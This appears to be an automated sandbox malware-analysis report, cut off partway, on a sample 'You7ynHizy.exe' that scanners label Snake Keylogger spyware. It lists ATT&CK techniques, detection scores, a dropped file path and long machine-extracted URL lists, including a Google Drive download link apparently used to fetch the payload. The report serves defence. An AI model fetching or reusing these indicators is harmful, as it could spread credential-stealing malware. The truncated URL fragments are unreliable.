      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      You7ynHizy.exe66%VirustotalBrowse
      You7ynHizy.exe65%ReversingLabsWin32.Spyware.Snakekeylogger
      You7ynHizy.exe100%AviraTR/Injector.ljese

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe100%AviraTR/Injector.ljese
      C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe65%ReversingLabsWin32.Spyware.Snakekeylogger

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://drive.go0%Avira URL Cloudsafe
      https://dhttps://drive.usercontez0%Avira URL Cloudsafe
      http://www.microsoft.D0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.185.110
      		truefalse
        		high
        drive.usercontent.google.com
        		216.58.206.65
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/8msiexec.exe, 00000008.00000003.3203654773.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3203690711.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214968026.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214929617.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/nt.youtube.commsiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.google.com/xmsiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179936341.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642907755.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895819803.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642875929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906716111.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906685901.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895772098.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3190978777.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2918962381.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930939009.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.google.com/omsiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/rcontent.googlmsiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/rmsiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3226483699.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3226517878.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://drive.usercontent.google.com/&msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://translate.google.com/translate_a/elememsiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.com/pmsiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989745617.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977040669.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000676014.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977069377.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorYou7ynHizy.exe, You7ynHizy.exe.2.drfalse
                                            		high
                                            http://www.microsoft.Dpowershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://drive.google.com/Hmsiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/rancisco1msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.gomsiexec.exe, 00000008.00000003.3179936341.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872951148.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/(Emsiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.commsiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dhttps://drive.usercontezmsiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895819803.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906716111.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906685901.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872951148.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895772098.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2883989316.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://drive.usercontent.google.com/download?id=1dCdPObravzmsiexec.exe, 00000008.00000003.2607825017.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2607772288.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/PE5$msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.micropowershell.exe, 00000002.00000002.2516957835.0000000007015000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2511889664.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/commsiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2953438343.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2918962381.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046262604.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070631388.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977040669.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000676014.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3105851980.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3353303555.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214968026.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3058991671.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214929617.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157221364.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2953483621.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977069377.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140414130.0000000007676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/KSSMmsiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.usercontent.google.com/8Fmsiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/Pmsiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070631388.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3058991671.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.usercontent.google.com/oftmsiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://apis.google.commsiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2511889664.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/~omsiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116840171.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116878506.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140381354.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093433677.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3023170701.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012198681.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive.google.com/emsiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.usercontent.google.com/3msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 